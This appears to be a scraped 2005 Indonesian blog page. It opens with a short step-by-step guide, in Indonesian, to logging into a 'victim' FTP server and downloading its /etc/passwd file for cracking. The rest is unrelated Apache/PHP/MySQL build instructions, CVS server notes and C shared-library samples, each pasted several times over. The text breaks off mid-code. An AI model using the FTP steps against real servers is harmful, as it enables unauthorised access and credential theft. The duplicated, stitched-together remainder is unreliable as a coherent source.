Berikut ini adalah cara menghack menggunakan Windows, yang digunakan untuk mendapatkan password file dari sebuah shell.Cara ini menggunakan ftp protocol.Kebanyakan paswordnya id sembunyikan /shadowed, tapi kamu masih bisa mendapatkannya dg meng-finger atau menebak passwordnya untuk loginnya.
Kamu dapat memulainya dg membuka/memasuki sebuah shell, dan kamu tidak perlu/tidak harus menggunakan/ berada didalam sebuah ftp server.berikut langkah langkahnya :
1.jalankan prompt
2.Tuliskan command untuk membuka dos command prompt
3.tuliskan ftp victim.com (nama server yg ingin di hacking !!)
4.Akan muncul prompt login.. tekan enter saja (tidak perlu menuliskan apa apa)
5.Akan muncul password login.. tekan saja enter...
6.sekarang ketiklah "quote user ftp" dan tekan enter
7.lalu ketik "quote cwd ~root" tekan enter
8.dan ketikan "quote pass ftp" tekan enter
Sekarang kamu sudah memiliki guest access dan dapat mendownload password file.. and have a fuckin' shit with that
9.ketiklah "cd etc" tekan enter.. untuk mendapatkan -etc directory- yg berisi file password
10.ketiklah "get passwd" untuk mendownload passw.file ke HD mu
Dengan demikian kita sudah memiliki password file dari victim dan kita dapat membukanya di C:\passwd dengan menggunakan notepad
Jika file tersebut di enkripsi.. kamu bisa meng-crack.. dan jika tidak dienkripsi..berarti anda berhasil
kamu dapat mencocokan antara user login dg passwordnya....
thanks
Thursday, March 10, 2005
Tuesday, March 08, 2005
Apache/PHP/MySQL with SSL Installation
# Move to /usr/local
cd /usr/local
# Get the following source:
ftp://ftp.openssl.org/source/openssl-0.9.7c.tar.gz
http://www.ibiblio.org/pub/mirrors/apache/httpd/httpd-2.0.48.tar.gz
http://www.linuxguruz.org/downloads/php-4.3.4.tar.gz
http://mysql.secsup.org/Downloads/MySQL-4.0/mysql-4.0.17.tar.gz
# Decompress the sources:
tar -xvzf openssl-0.9.7c.tar.gz
tar -xvzf httpd-2.0.48.tar.gz
tar -xvzf php-4.3.4.tar.gz
tar -xvzf mysql-4.0.17.tar.gz
cd ../mysql-4.0.17
./configure
make
make install
scripts/mysql_install_db
adduser mysql
# In the file /etc/login.access add this line:
-:mysql:ALL
# So the user mysql never actualy logs in
# For Slackware:
chown -R mysql.users /usr/local/var
# For Redhat:
chown -R mysql.mysql /usr/local/var
mysqld_safe --user=mysql &
# Hit
mysqladmin -u root password 'yourpasswordhere'
cd ../openssl-0.9.7c
sh config -fPIC
make
# If you get a "Not enough room for program headers" error here,
# install the LATEST version of binutils.
cd ../httpd-2.0.48
SSL_BASE=../openssl-0.9.7c ./configure --prefix=/usr/local/apache --enable-module=all --enable-ssl --enable-so
make
# Note: There is a Redhat bug that complains about mod_auth_dbm.so
# during the Apache `make` proccess. Adding the configuration
# switch --disable-module=auth_dbm to the end of the ./configure line
# will fix it.
# If you presently have a libphp4.so module you should make a backup:
cp /usr/local/apache/modules/libphp4.so /usr/local/apache/modules/libphp4.so.was
# If you have a file called /usr/local/apache/conf/httpd.conf already you
# should make a backup:
mv /usr/local/apache/conf/httpd.conf /usr/local/apache/conf/httpd.conf.was
# This way you'll get a fresh httpd.conf with all your Apache modules listed
# and 100% loadable.
# Don't worry if your web server is presently running. The httpd.conf file
# is only read by the httpd binary when starting the web server.
make install
# Now to create a "test certificate".
cd /usr/local/apache/conf/
openssl genrsa -des3 -out ca.key 1024
# Note: In order to go live, the "Common Name" has to match the server's
# host adress.
openssl req -new -x509 -days 365 -key ca.key -out ca.crt
openssl genrsa -des3 -out server.key 1024
openssl req -new -days 365 -key server.key -out server.crt
wget http://www.linuxguruz.com/downloads/sign.sh
chmod +x sign.sh
./sign.sh server.crt
chmod -x sign.sh
mkdir ssl.crt ssl.key
cp server.crt ssl.crt
cp server.key ssl.key
#
cd ../php-4.3.4
./configure --with-apxs2=/usr/local/apache/bin/apxs --with-config-file-path=/usr/local/apache/conf --enable-versioning --with-mysql=/usr/local --enable-ftp --enable-bcmath --disable-debug --enable-memory-limit=yes --enable-track-vars
make
make install
# Make sure you have, Uncomment (remove the #'s), Change or Create
# the following lines in the file /usr/local/apache/conf/httpd.conf
LoadModule php4_module libexec/libphp4.so
DirectoryIndex index.html index.php index.php3 index.phtml
# And for PHP 4.x, use:
#
AddType application/x-httpd-php .php .php3 .phtml
AddType application/x-httpd-php-source .phps
cp /usr/local/php-4.3.4/php.ini-dist /usr/local/apache/conf/php.ini
# Start Apache:
/usr/local/apache/bin/apachectl startssl
# Create a file in /usr/local/apache/htdocs called index.php
-html-
-head--title-PHP Test Page-/title--/head-
-body-
-? phpinfo(); ?-
-/body-
-/html-
# Point your Web Browser at:
http://localhost/index.php
Anyone who wishes to make additions or changes to this
PHP Tutorial email them to webmaster@linuxguruz.com
cd /usr/local
# Get the following source:
ftp://ftp.openssl.org/source/openssl-0.9.7c.tar.gz
http://www.ibiblio.org/pub/mirrors/apache/httpd/httpd-2.0.48.tar.gz
http://www.linuxguruz.org/downloads/php-4.3.4.tar.gz
http://mysql.secsup.org/Downloads/MySQL-4.0/mysql-4.0.17.tar.gz
# Decompress the sources:
tar -xvzf openssl-0.9.7c.tar.gz
tar -xvzf httpd-2.0.48.tar.gz
tar -xvzf php-4.3.4.tar.gz
tar -xvzf mysql-4.0.17.tar.gz
cd ../mysql-4.0.17
./configure
make
make install
scripts/mysql_install_db
adduser mysql
# In the file /etc/login.access add this line:
-:mysql:ALL
# So the user mysql never actualy logs in
# For Slackware:
chown -R mysql.users /usr/local/var
# For Redhat:
chown -R mysql.mysql /usr/local/var
mysqld_safe --user=mysql &
# Hit
mysqladmin -u root password 'yourpasswordhere'
cd ../openssl-0.9.7c
sh config -fPIC
make
# If you get a "Not enough room for program headers" error here,
# install the LATEST version of binutils.
cd ../httpd-2.0.48
SSL_BASE=../openssl-0.9.7c ./configure --prefix=/usr/local/apache --enable-module=all --enable-ssl --enable-so
make
# Note: There is a Redhat bug that complains about mod_auth_dbm.so
# during the Apache `make` proccess. Adding the configuration
# switch --disable-module=auth_dbm to the end of the ./configure line
# will fix it.
# If you presently have a libphp4.so module you should make a backup:
cp /usr/local/apache/modules/libphp4.so /usr/local/apache/modules/libphp4.so.was
# If you have a file called /usr/local/apache/conf/httpd.conf already you
# should make a backup:
mv /usr/local/apache/conf/httpd.conf /usr/local/apache/conf/httpd.conf.was
# This way you'll get a fresh httpd.conf with all your Apache modules listed
# and 100% loadable.
# Don't worry if your web server is presently running. The httpd.conf file
# is only read by the httpd binary when starting the web server.
make install
# Now to create a "test certificate".
cd /usr/local/apache/conf/
openssl genrsa -des3 -out ca.key 1024
# Note: In order to go live, the "Common Name" has to match the server's
# host adress.
openssl req -new -x509 -days 365 -key ca.key -out ca.crt
openssl genrsa -des3 -out server.key 1024
openssl req -new -days 365 -key server.key -out server.crt
wget http://www.linuxguruz.com/downloads/sign.sh
chmod +x sign.sh
./sign.sh server.crt
chmod -x sign.sh
mkdir ssl.crt ssl.key
cp server.crt ssl.crt
cp server.key ssl.key
#
cd ../php-4.3.4
./configure --with-apxs2=/usr/local/apache/bin/apxs --with-config-file-path=/usr/local/apache/conf --enable-versioning --with-mysql=/usr/local --enable-ftp --enable-bcmath --disable-debug --enable-memory-limit=yes --enable-track-vars
make
make install
# Make sure you have, Uncomment (remove the #'s), Change or Create
# the following lines in the file /usr/local/apache/conf/httpd.conf
LoadModule php4_module libexec/libphp4.so
DirectoryIndex index.html index.php index.php3 index.phtml
# And for PHP 4.x, use:
#
AddType application/x-httpd-php .php .php3 .phtml
AddType application/x-httpd-php-source .phps
cp /usr/local/php-4.3.4/php.ini-dist /usr/local/apache/conf/php.ini
# Start Apache:
/usr/local/apache/bin/apachectl startssl
# Create a file in /usr/local/apache/htdocs called index.php
-html-
-head--title-PHP Test Page-/title--/head-
-body-
-? phpinfo(); ?-
-/body-
-/html-
# Point your Web Browser at:
http://localhost/index.php
Anyone who wishes to make additions or changes to this
PHP Tutorial email them to webmaster@linuxguruz.com
Apache/PHP/MySQL Installation
Title: Apache/PHP/MySQL Installation
Contributor: yudhax (aka Ranman)
Last Update: Mart 08 22:24 EST 2005
# Move to /usr/local
cd /usr/local
# Get the following source:
http://www.ibiblio.org/pub/mirrors/apache/httpd/httpd-2.0.48.tar.gz
http://www.linuxguruz.org/downloads/php-4.3.4.tar.gz
http://mysql.secsup.org/Downloads/MySQL-3.23/mysql-3.23.55.tar.gz
# Decompress the sources:
tar -xvzf httpd-2.0.48.tar.gz
tar -xvzf php-4.3.4.tar.gz
tar -xvzf mysql-4.0.17.tar.gz
cd ../mysql-4.0.17
./configure
make
make install
scripts/mysql_install_db
adduser mysql
# In the file /etc/login.access add this line:
-:mysql:ALL
# So the user mysql never actualy logs in
# For Slackware:
chown -R mysql.users /usr/local/var
# For Redhat:
chown -R mysql.mysql /usr/local/var
mysqld_safe --user=mysql &
# Hit
mysqladmin -u root password 'yourpasswordhere'
cd ../httpd-2.0.48
./configure --prefix=/usr/local/apache --enable-module=all --enable-so
make
# Note: There is a Redhat bug that complains about mod_auth_dbm.so
# during the Apache `make` proccess. Adding the configuration
# switch --disable-module=auth_dbm to the end of the ./configure line
# will fix it.
# If you presently have a libphp4.so module you should make a backup:
cp /usr/local/apache/libexec/libphp4.so /usr/local/apache/libexec/libphp4.so.was
# If you have a file called /usr/local/apache/conf/httpd.conf already, you
# should make a backup:
mv /usr/local/apache/conf/httpd.conf /usr/local/apache/conf/httpd.conf.was
# This way you'll get a fresh httpd.conf with all your Apache modules listed
# and 100% loadable.
# Don't worry if your web server is presently running. The httpd.conf file
# is only read by the httpd binary when starting the web server.
make install
cd ../php-4.3.4
./configure --with-apxs2=/usr/local/apache/bin/apxs --with-config-file-path=/usr/local/apache/conf --enable-versioning --with-mysql=/usr/local --enable-ftp --with-gd --enable-bcmath --disable-debug --enable-memory-limit=yes --enable-track-vars
make
make install
# Make sure you have, Uncomment (remove the #'s), Change or Create
# the following lines in the file /usr/local/apache/conf/httpd.conf
LoadModule php4_module libexec/libphp4.so
DirectoryIndex index.html index.php index.php3 index.phtml
# And for PHP 4.x, use:
#
AddType application/x-httpd-php .php .php3 .phtml
AddType application/x-httpd-php-source .phps
cp /usr/local/php-4.3.4/php.ini-dist /usr/local/apache/conf/php.ini
# Start Apache:
/usr/local/apache/bin/apachectl start
# Create a file in /usr/local/apache/htdocs called index.php
head--title-PHP Test Page-/title--/head
body
? phpinfo(); ?
/body
/html
# Point your Web Browser at:
http://localhost/index.php
Anyone who wishes to make additions or changes to this
PHP Tutorial email them to webmaster@linuxguruz.org
Copyright (c) 1999, 2000, 2001, 2002, 2003 and 2004 by LinuxGuru
Contributor: yudhax (aka Ranman)
Last Update: Mart 08 22:24 EST 2005
# Move to /usr/local
cd /usr/local
# Get the following source:
http://www.ibiblio.org/pub/mirrors/apache/httpd/httpd-2.0.48.tar.gz
http://www.linuxguruz.org/downloads/php-4.3.4.tar.gz
http://mysql.secsup.org/Downloads/MySQL-3.23/mysql-3.23.55.tar.gz
# Decompress the sources:
tar -xvzf httpd-2.0.48.tar.gz
tar -xvzf php-4.3.4.tar.gz
tar -xvzf mysql-4.0.17.tar.gz
cd ../mysql-4.0.17
./configure
make
make install
scripts/mysql_install_db
adduser mysql
# In the file /etc/login.access add this line:
-:mysql:ALL
# So the user mysql never actualy logs in
# For Slackware:
chown -R mysql.users /usr/local/var
# For Redhat:
chown -R mysql.mysql /usr/local/var
mysqld_safe --user=mysql &
# Hit
mysqladmin -u root password 'yourpasswordhere'
cd ../httpd-2.0.48
./configure --prefix=/usr/local/apache --enable-module=all --enable-so
make
# Note: There is a Redhat bug that complains about mod_auth_dbm.so
# during the Apache `make` proccess. Adding the configuration
# switch --disable-module=auth_dbm to the end of the ./configure line
# will fix it.
# If you presently have a libphp4.so module you should make a backup:
cp /usr/local/apache/libexec/libphp4.so /usr/local/apache/libexec/libphp4.so.was
# If you have a file called /usr/local/apache/conf/httpd.conf already, you
# should make a backup:
mv /usr/local/apache/conf/httpd.conf /usr/local/apache/conf/httpd.conf.was
# This way you'll get a fresh httpd.conf with all your Apache modules listed
# and 100% loadable.
# Don't worry if your web server is presently running. The httpd.conf file
# is only read by the httpd binary when starting the web server.
make install
cd ../php-4.3.4
./configure --with-apxs2=/usr/local/apache/bin/apxs --with-config-file-path=/usr/local/apache/conf --enable-versioning --with-mysql=/usr/local --enable-ftp --with-gd --enable-bcmath --disable-debug --enable-memory-limit=yes --enable-track-vars
make
make install
# Make sure you have, Uncomment (remove the #'s), Change or Create
# the following lines in the file /usr/local/apache/conf/httpd.conf
LoadModule php4_module libexec/libphp4.so
DirectoryIndex index.html index.php index.php3 index.phtml
# And for PHP 4.x, use:
#
AddType application/x-httpd-php .php .php3 .phtml
AddType application/x-httpd-php-source .phps
cp /usr/local/php-4.3.4/php.ini-dist /usr/local/apache/conf/php.ini
# Start Apache:
/usr/local/apache/bin/apachectl start
# Create a file in /usr/local/apache/htdocs called index.php
head--title-PHP Test Page-/title--/head
body
? phpinfo(); ?
/body
/html
# Point your Web Browser at:
http://localhost/index.php
Anyone who wishes to make additions or changes to this
PHP Tutorial email them to webmaster@linuxguruz.org
Copyright (c) 1999, 2000, 2001, 2002, 2003 and 2004 by LinuxGuru
Apache/PHP/MySQL Installation
Title: Apache/PHP/MySQL Installation
Contributor: yudhax (aka Ranman)
Last Update: Mart 08 22:24 EST 2005
# Move to /usr/local
cd /usr/local
# Get the following source:
http://www.ibiblio.org/pub/mirrors/apache/httpd/httpd-2.0.48.tar.gz
http://www.linuxguruz.org/downloads/php-4.3.4.tar.gz
http://mysql.secsup.org/Downloads/MySQL-3.23/mysql-3.23.55.tar.gz
# Decompress the sources:
tar -xvzf httpd-2.0.48.tar.gz
tar -xvzf php-4.3.4.tar.gz
tar -xvzf mysql-4.0.17.tar.gz
cd ../mysql-4.0.17
./configure
make
make install
scripts/mysql_install_db
adduser mysql
# In the file /etc/login.access add this line:
-:mysql:ALL
# So the user mysql never actualy logs in
# For Slackware:
chown -R mysql.users /usr/local/var
# For Redhat:
chown -R mysql.mysql /usr/local/var
mysqld_safe --user=mysql &
# Hit
mysqladmin -u root password 'yourpasswordhere'
cd ../httpd-2.0.48
./configure --prefix=/usr/local/apache --enable-module=all --enable-so
make
# Note: There is a Redhat bug that complains about mod_auth_dbm.so
# during the Apache `make` proccess. Adding the configuration
# switch --disable-module=auth_dbm to the end of the ./configure line
# will fix it.
# If you presently have a libphp4.so module you should make a backup:
cp /usr/local/apache/libexec/libphp4.so /usr/local/apache/libexec/libphp4.so.was
# If you have a file called /usr/local/apache/conf/httpd.conf already, you
# should make a backup:
mv /usr/local/apache/conf/httpd.conf /usr/local/apache/conf/httpd.conf.was
# This way you'll get a fresh httpd.conf with all your Apache modules listed
# and 100% loadable.
# Don't worry if your web server is presently running. The httpd.conf file
# is only read by the httpd binary when starting the web server.
make install
cd ../php-4.3.4
./configure --with-apxs2=/usr/local/apache/bin/apxs --with-config-file-path=/usr/local/apache/conf --enable-versioning --with-mysql=/usr/local --enable-ftp --with-gd --enable-bcmath --disable-debug --enable-memory-limit=yes --enable-track-vars
make
make install
# Make sure you have, Uncomment (remove the #'s), Change or Create
# the following lines in the file /usr/local/apache/conf/httpd.conf
LoadModule php4_module libexec/libphp4.so
DirectoryIndex index.html index.php index.php3 index.phtml
# And for PHP 4.x, use:
#
AddType application/x-httpd-php .php .php3 .phtml
AddType application/x-httpd-php-source .phps
cp /usr/local/php-4.3.4/php.ini-dist /usr/local/apache/conf/php.ini
# Start Apache:
/usr/local/apache/bin/apachectl start
# Create a file in /usr/local/apache/htdocs called index.php
PHP Test Page
# Point your Web Browser at:
http://localhost/index.php
Anyone who wishes to make additions or changes to this
PHP Tutorial email them to webmaster@linuxguruz.org
Copyright (c) 1999, 2000, 2001, 2002, 2003 and 2004 by LinuxGuru
Contributor: yudhax (aka Ranman)
Last Update: Mart 08 22:24 EST 2005
# Move to /usr/local
cd /usr/local
# Get the following source:
http://www.ibiblio.org/pub/mirrors/apache/httpd/httpd-2.0.48.tar.gz
http://www.linuxguruz.org/downloads/php-4.3.4.tar.gz
http://mysql.secsup.org/Downloads/MySQL-3.23/mysql-3.23.55.tar.gz
# Decompress the sources:
tar -xvzf httpd-2.0.48.tar.gz
tar -xvzf php-4.3.4.tar.gz
tar -xvzf mysql-4.0.17.tar.gz
cd ../mysql-4.0.17
./configure
make
make install
scripts/mysql_install_db
adduser mysql
# In the file /etc/login.access add this line:
-:mysql:ALL
# So the user mysql never actualy logs in
# For Slackware:
chown -R mysql.users /usr/local/var
# For Redhat:
chown -R mysql.mysql /usr/local/var
mysqld_safe --user=mysql &
# Hit
mysqladmin -u root password 'yourpasswordhere'
cd ../httpd-2.0.48
./configure --prefix=/usr/local/apache --enable-module=all --enable-so
make
# Note: There is a Redhat bug that complains about mod_auth_dbm.so
# during the Apache `make` proccess. Adding the configuration
# switch --disable-module=auth_dbm to the end of the ./configure line
# will fix it.
# If you presently have a libphp4.so module you should make a backup:
cp /usr/local/apache/libexec/libphp4.so /usr/local/apache/libexec/libphp4.so.was
# If you have a file called /usr/local/apache/conf/httpd.conf already, you
# should make a backup:
mv /usr/local/apache/conf/httpd.conf /usr/local/apache/conf/httpd.conf.was
# This way you'll get a fresh httpd.conf with all your Apache modules listed
# and 100% loadable.
# Don't worry if your web server is presently running. The httpd.conf file
# is only read by the httpd binary when starting the web server.
make install
cd ../php-4.3.4
./configure --with-apxs2=/usr/local/apache/bin/apxs --with-config-file-path=/usr/local/apache/conf --enable-versioning --with-mysql=/usr/local --enable-ftp --with-gd --enable-bcmath --disable-debug --enable-memory-limit=yes --enable-track-vars
make
make install
# Make sure you have, Uncomment (remove the #'s), Change or Create
# the following lines in the file /usr/local/apache/conf/httpd.conf
LoadModule php4_module libexec/libphp4.so
DirectoryIndex index.html index.php index.php3 index.phtml
# And for PHP 4.x, use:
#
AddType application/x-httpd-php .php .php3 .phtml
AddType application/x-httpd-php-source .phps
cp /usr/local/php-4.3.4/php.ini-dist /usr/local/apache/conf/php.ini
# Start Apache:
/usr/local/apache/bin/apachectl start
# Create a file in /usr/local/apache/htdocs called index.php
# Point your Web Browser at:
http://localhost/index.php
Anyone who wishes to make additions or changes to this
PHP Tutorial email them to webmaster@linuxguruz.org
Copyright (c) 1999, 2000, 2001, 2002, 2003 and 2004 by LinuxGuru
Some notes on CVS
Setup and run the CVS server
Look for cvs services listed in /etc/servics
# grep cvs /etc/services
cvspserver2401/tcp# CVS client/server operations
cvspserver2401/udp# CVS client/server operations
cvsup 5999/tcpCVSup# CVSup file transfer/John Polstra/FreeBSD
cvsup 5999/udpCVSup# CVSup file transfer/John Polstra/FreeBSD
#
Add cvs pserver to xinted
# cd /etc/xinetd.d/
# cat cvspserver
# service cvspserver
{
socket_type = stream
protocol = tcp
wait = no
user = root
passenv =
server = /usr/bin/cvs
server_args = --allow-root=/cvs pserver -f
}
# /sbin/service xinetd restart
Adding CVS users and CVS passwd file
Used this perl script to generate a password ( you can also use htpasswd )
$ cat passwd.pl
#!/usr/bin/perl -w
$saltchars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789./';
while (<>) {
chomp $_;
my ($salt) = substr($saltchars, rand(64), 1) . substr($saltchars, rand(64), 1);
my ($c) = crypt($_, $salt);
print "'$_' => '$c'\n";
}
Generate a password
$ ./passwd.pl
password
'password' => 'OKqq1ib8XEv2E'
$
Add the password into the password file
$ cd $CVSROOT/CVSROOT
$ cat passwd
cvs-user:OKqq1ib8XEv2E:
$
Connecting to the CVS server
Login from another machine like this
$ cvs -d :pserver:cvs-user@serverbox.your.domain.com:/cvs login
(Logging in to cvs-user@serverbox.your.domain.com)
CVS password:
$
Or like this
$setenv CVSROOT :pserver:cvs-user@serverbox.your.domain.com:/cvs
$cvs login
Fixing some common CVS glitches
Got the folowing error:
cvs co -r open-source-product-121-trial-build open-source-product-121
cvs server: cannot open /root/.cvsignore: Permission denied
cvs [server aborted]: can't chdir(/root): Permission denied
Fixed by :
$
#unset HOME
#/etc/rc.d/init.d/inet restart
#/sbin/service xinetd restart
Or by : ( not recommended )
# chmod a+w /root
# chmod a+x /root
Sticky problems
problem:
$ cvs commit -m "adding new version" foobar.c
cvs server: sticky tag 'RELEASE-CANDIDATE-1' for file 'foobar.c' is not a branch
cvs [server aborted]: correct above errors first!
$
fix using an update:
$ cvs update -A foobar.c
M foobar.c
$
$ cvs commit -m "adding new version" foobar.c
Checking in package;
/your/open/source/program/foobar.c,v <-- foobar.c
new revision: 1.2; previous revision: 1.1
done
$
On HP-UX rsh is not the remoteshell remsh is the remote shell,
So you might need to add:
$ setenv CVS_RSH /bin/remsh
Some common CVS commands
$ cd /the/downlaoded/open-source-product/121/source/base/
$ cvs import -m "open-source-product 1.2.1 source import" \
open-source-product-121 FOOBAR open-source-product121
$ cvs checkout open-source-product-121
U open-source-product-121/open-source-product/Makefile.in
....
$ cvs checkout open-source-product-121
$ cvs commit -m "Added FOOBAR specific changes"
Checking in open-source-product/nsprpub/configure;
/cvs/open-source-product-121/open-source-product/nsprpub/configure,v <-- configure
new revision: 1.2; previous revision: 1.1
done
$ cvs -q tag open-source-product-121-trial-build
$ cvs checkout -r open-source-product-121-trial-build open-source-product-121
$ mkdir build
$ cvs add build/
$ cvs -q tag open-source-product-121-trial-build
$ cvs tag -R open-source-product-121-trial-build
$ cvs co -r open-source-product-121-trial-build open-source-product-121
Look for cvs services listed in /etc/servics
# grep cvs /etc/services
cvspserver2401/tcp# CVS client/server operations
cvspserver2401/udp# CVS client/server operations
cvsup 5999/tcpCVSup# CVSup file transfer/John Polstra/FreeBSD
cvsup 5999/udpCVSup# CVSup file transfer/John Polstra/FreeBSD
#
Add cvs pserver to xinted
# cd /etc/xinetd.d/
# cat cvspserver
# service cvspserver
{
socket_type = stream
protocol = tcp
wait = no
user = root
passenv =
server = /usr/bin/cvs
server_args = --allow-root=/cvs pserver -f
}
# /sbin/service xinetd restart
Adding CVS users and CVS passwd file
Used this perl script to generate a password ( you can also use htpasswd )
$ cat passwd.pl
#!/usr/bin/perl -w
$saltchars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789./';
while (<>) {
chomp $_;
my ($salt) = substr($saltchars, rand(64), 1) . substr($saltchars, rand(64), 1);
my ($c) = crypt($_, $salt);
print "'$_' => '$c'\n";
}
Generate a password
$ ./passwd.pl
password
'password' => 'OKqq1ib8XEv2E'
$
Add the password into the password file
$ cd $CVSROOT/CVSROOT
$ cat passwd
cvs-user:OKqq1ib8XEv2E:
$
Connecting to the CVS server
Login from another machine like this
$ cvs -d :pserver:cvs-user@serverbox.your.domain.com:/cvs login
(Logging in to cvs-user@serverbox.your.domain.com)
CVS password:
$
Or like this
$setenv CVSROOT :pserver:cvs-user@serverbox.your.domain.com:/cvs
$cvs login
Fixing some common CVS glitches
Got the folowing error:
cvs co -r open-source-product-121-trial-build open-source-product-121
cvs server: cannot open /root/.cvsignore: Permission denied
cvs [server aborted]: can't chdir(/root): Permission denied
Fixed by :
$
#unset HOME
#/etc/rc.d/init.d/inet restart
#/sbin/service xinetd restart
Or by : ( not recommended )
# chmod a+w /root
# chmod a+x /root
Sticky problems
problem:
$ cvs commit -m "adding new version" foobar.c
cvs server: sticky tag 'RELEASE-CANDIDATE-1' for file 'foobar.c' is not a branch
cvs [server aborted]: correct above errors first!
$
fix using an update:
$ cvs update -A foobar.c
M foobar.c
$
$ cvs commit -m "adding new version" foobar.c
Checking in package;
/your/open/source/program/foobar.c,v <-- foobar.c
new revision: 1.2; previous revision: 1.1
done
$
On HP-UX rsh is not the remoteshell remsh is the remote shell,
So you might need to add:
$ setenv CVS_RSH /bin/remsh
Some common CVS commands
$ cd /the/downlaoded/open-source-product/121/source/base/
$ cvs import -m "open-source-product 1.2.1 source import" \
open-source-product-121 FOOBAR open-source-product121
$ cvs checkout open-source-product-121
U open-source-product-121/open-source-product/Makefile.in
....
$ cvs checkout open-source-product-121
$ cvs commit -m "Added FOOBAR specific changes"
Checking in open-source-product/nsprpub/configure;
/cvs/open-source-product-121/open-source-product/nsprpub/configure,v <-- configure
new revision: 1.2; previous revision: 1.1
done
$ cvs -q tag open-source-product-121-trial-build
$ cvs checkout -r open-source-product-121-trial-build open-source-product-121
$ mkdir build
$ cvs add build/
$ cvs -q tag open-source-product-121-trial-build
$ cvs tag -R open-source-product-121-trial-build
$ cvs co -r open-source-product-121-trial-build open-source-product-121
Sample Code - Using shared libs on UNIX
Sample C code for :
1. Creating a shared library
2. Runtime loading of a shared library
3. Calling a method from the loaded library
On GNU/Linux :
share.c
/*
* sample code for creating a shared library on GNU/Linux
*
* cc -fPIC -c share.c -o share.o
* ld -shared share.o -o share.sl
*
* kishan@hackorama.com ( www.hackorama.com ) Feb 2001
*
*/
#include
void
share( int value )
{
fprintf( stdout, "\nthe answer is %d\n", value );
}
------------ cut ----------
#cc -fPIC -c share.c -o share.o
#ld -shared share.o -o share.sl
main.c [ using dlopen(), dlsym() ]
coding ---
/*
* sample code for loading, calling a method from
* and unloading a shared library on GNU/Linux
*
* cc main.c -o main -ldl
*
* If using c++ compiler the symbol names will be mangled
* So a method called "share" will be "share__Fi" in the
* shared library, Please do a "nm share.sl" to find the
* mangled symbol for the method.
*
* kishan@hackorama.com ( www.hackorama.com ) Feb 2001
*
*/
#include
#include
int
main( void )
{
const char *sh_lib = "share.sl" ;
const char *method = "share";
void (*fp) (int) = NULL ;
void *handle = dlopen( sh_lib , RTLD_NOW );
if( handle == NULL ){
fprintf( stderr, "\nfailed loading %s\n", sh_lib );
exit(1);
}else{
fp = ( void (*)(int) )dlsym( handle, method );
if( fp == NULL )
fprintf( stderr, "\nfailed getting method %s\n", method);
else
fp( 42 );
if ( dlclose(handle) != 0 )
fprintf( stderr, "\nfailed unloading %s\n", sh_lib );
}
exit(0);
}
----------------------- cut _------------------
cc main.c -o main -ldl
On HP-UX :
share.c
coding ---
/*
* sample code for creating a shared library on HP-UX
*
* cc +z -c share.c -o share.o
* ld -b share.o -o share.sl
*
* kishan@hackorama.com ( www.hackorama.com ) Feb 2001
*
*/
#include
void
share( int value )
{
fprintf( stdout, "\n\nthe answer is %d\n\n", value );
}
------------------------- cut -------------------------
cc +z -c share.c -o share.o
ld -b share.o -o share.sl
main.c [ using shl_load(), shl_findsym() ]
coding ---
/*
* sample code for loading , calling a method from
* and unloading a shared library on HP-UX
*
* cc main.c -o main
*
* If using a c++ compiler the symbol names will be mangled
* So a method called "share" will be "share__Fi" in the
* shared library, Please do a "nm share.sl" to find the
* mangled symbol for the method.
*
* kishan@hackorama.com ( www.hackorama.com ) Feb 2001
*
*/
#include
#include
int
main( void )
{
const char* sh_lib = "share.sl";
const char* method = "share";
void (*fp) ( int value ) = NULL ;
shl_t handle = shl_load( sh_lib , BIND_IMMEDIATE , NULL );
if( handle == NULL ){
fprintf( stderr, "\nfailed loading %s\n", sh_lib);
exit(1);
}else{
shl_findsym( &handle, method, TYPE_UNDEFINED, &fp );
if( fp == NULL )
fprintf( stderr, "\nfailed getting method %s\n", method);
else
fp( 42 );
if ( shl_unload( handle ) != 0 )
fprintf( stderr, "\nfailed unloading %s\n", sh_lib);
}
exit(0);
}
------------------------- cut ----------------------
cc main.c -o main
The linux sample code should work for other UNIX flavours, which use dlopen()/dlsym(). Only HP-UX uses shl_load()/shl_findsym(). Please look at the man pages of cc and ld for the correct flags to be used for the particular version of UNIX.
1. Creating a shared library
2. Runtime loading of a shared library
3. Calling a method from the loaded library
On GNU/Linux :
share.c
/*
* sample code for creating a shared library on GNU/Linux
*
* cc -fPIC -c share.c -o share.o
* ld -shared share.o -o share.sl
*
* kishan@hackorama.com ( www.hackorama.com ) Feb 2001
*
*/
#include
void
share( int value )
{
fprintf( stdout, "\nthe answer is %d\n", value );
}
------------ cut ----------
#cc -fPIC -c share.c -o share.o
#ld -shared share.o -o share.sl
main.c [ using dlopen(), dlsym() ]
coding ---
/*
* sample code for loading, calling a method from
* and unloading a shared library on GNU/Linux
*
* cc main.c -o main -ldl
*
* If using c++ compiler the symbol names will be mangled
* So a method called "share" will be "share__Fi" in the
* shared library, Please do a "nm share.sl" to find the
* mangled symbol for the method.
*
* kishan@hackorama.com ( www.hackorama.com ) Feb 2001
*
*/
#include
#include
int
main( void )
{
const char *sh_lib = "share.sl" ;
const char *method = "share";
void (*fp) (int) = NULL ;
void *handle = dlopen( sh_lib , RTLD_NOW );
if( handle == NULL ){
fprintf( stderr, "\nfailed loading %s\n", sh_lib );
exit(1);
}else{
fp = ( void (*)(int) )dlsym( handle, method );
if( fp == NULL )
fprintf( stderr, "\nfailed getting method %s\n", method);
else
fp( 42 );
if ( dlclose(handle) != 0 )
fprintf( stderr, "\nfailed unloading %s\n", sh_lib );
}
exit(0);
}
----------------------- cut _------------------
cc main.c -o main -ldl
On HP-UX :
share.c
coding ---
/*
* sample code for creating a shared library on HP-UX
*
* cc +z -c share.c -o share.o
* ld -b share.o -o share.sl
*
* kishan@hackorama.com ( www.hackorama.com ) Feb 2001
*
*/
#include
void
share( int value )
{
fprintf( stdout, "\n\nthe answer is %d\n\n", value );
}
------------------------- cut -------------------------
cc +z -c share.c -o share.o
ld -b share.o -o share.sl
main.c [ using shl_load(), shl_findsym() ]
coding ---
/*
* sample code for loading , calling a method from
* and unloading a shared library on HP-UX
*
* cc main.c -o main
*
* If using a c++ compiler the symbol names will be mangled
* So a method called "share" will be "share__Fi" in the
* shared library, Please do a "nm share.sl" to find the
* mangled symbol for the method.
*
* kishan@hackorama.com ( www.hackorama.com ) Feb 2001
*
*/
#include
#include
int
main( void )
{
const char* sh_lib = "share.sl";
const char* method = "share";
void (*fp) ( int value ) = NULL ;
shl_t handle = shl_load( sh_lib , BIND_IMMEDIATE , NULL );
if( handle == NULL ){
